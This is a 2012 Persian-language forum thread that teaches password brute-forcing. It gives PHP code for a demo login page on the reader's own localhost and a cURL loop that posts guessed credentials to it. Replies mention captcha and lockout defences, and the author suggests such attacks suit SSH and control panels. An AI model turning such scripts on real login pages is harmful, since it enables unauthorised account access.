bruteforce به همراه اسکریپت حمله به سایتها ....

**Codex** · 19th March 2012 08:26 PM

با سلام
طبق قولی که به یکی از کاربران داده بودم این نوع حمله رو به همراه اسکریپت و بصورت عملی توضیح میدم

توضیح اجمالی: bruteforce به معنای آزمون خطاست و در حمله به سایت ها یعنی اینقدر یوزر پس چک میکنیم تا درست از آب در بیاد.

نکته: تمامی فایلهایی که اینجا گفته میشه رو تو یه فولدر بریزین.

ابتدا صفحه ای به اسم login-attack.php ایجاد کنید و کد زیر را در آن قرار دهید:

کد PHP:


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
  <title>Hello!</title>
</head>
<body>
<?php
    if(isset($_POST['submit'])){
        if($_POST['username'] == 'mohsen' && $_POST['pass'] == 'soltani'){
            echo 'yes';
        }else{
            echo 'no';
        }
    }
?>
<form name="frm1" action="login-attack.php" method="post">
username:<input type="textbox" name="username"  /><br />
password:<input type="password" name="pass"  /><br />
<input type="submit" name="submit" Value="login"  />
</form>
</body>
</html>

این کد یک صفحه لاگینه که قراره بهش حمله کنیم

اسکریپت حمله:
از CURL استفاده میکنیم، برای راحتی کار توابع CURL رو در یک فایل جدا قرار میدیم و include میکنیم پس یک فایل به اسم brute_attack.php ایجاد کنید و کدهای زیر را در آن قرار دهید:

کد PHP:


<?php
    function attack($url,$post){
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,$url);
        curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
        $res = curl_exec($ch);
        curl_close($ch);
        return $res;
    }
?>

حالا یک فایل دیگر به اسم master-attack.php رو ایجاد میکنیم و کدهای زیر را در آن قرار میدهیم:

کد PHP:


<?php
    include("brute-attack.php");
    $url = "Your-address";
    @apache_setenv('no-gzip', 1);
    @ini_set('zlib.output_compression', 0);
    @ini_set('implicit_flush', 1);
    for ($i = 0; $i < 12; $i++) {
        $user .= '1';
        $pass .= '1';
        $post = "submit=submit&username=$user&pass=$pass";
        echo "with : username='$user'  password='$pass' ===>result : ".(strpos(attack($url,$post),'yes') > 1 ? 'yes' : 'no')."<br />";
        ob_end_flush();
        sleep(1);
    }
    ob_implicit_flush(1);
?>

جای your-address آدرس اونجایی که login-attack.php در لوکال هاستتون هست رو قرار بدین، حالا master-attack.php رو اجرا کنید.
این اسکریپت 12 بار یوزر پس را چک میکنه و ریزالت را بهتون نشون میده
در پست بعدی خط به خط مواردو توضیح میدم.

موضوعات مشابه:

نظرسنجی با استفاده از جاوا اسکریپت (Java Script)

**Hossein** · 19th March 2012 10:15 PM

اگه کپچا باشه این دیگه عمل نمیکنه درسته ؟ و همینطور محدودیت تعداد لاگین اشتباه ؟
راه های مقابله با این حملات رو هم بگی خیلی عالی میشه

**Codex** · 19th March 2012 10:26 PM

درسته برای web app میشه راحت جلوی این حملات رو گرفت
مثل گذاشتن captcha البته نه captcha سایت دانشگاه ! اون captcha رو میشه با روش dictionary دور زد

من مثال php زدم تا با مفهوم و نحوه کار آشنا بشین، این حملات بیشتر برای SSH کاربرد داره ، چون دیگه اونجا captcha و ... در کار نیست
برای DA و CP هم فکر کنم کاربرد داشته باشه

و حتی برای application های تحت ویندوز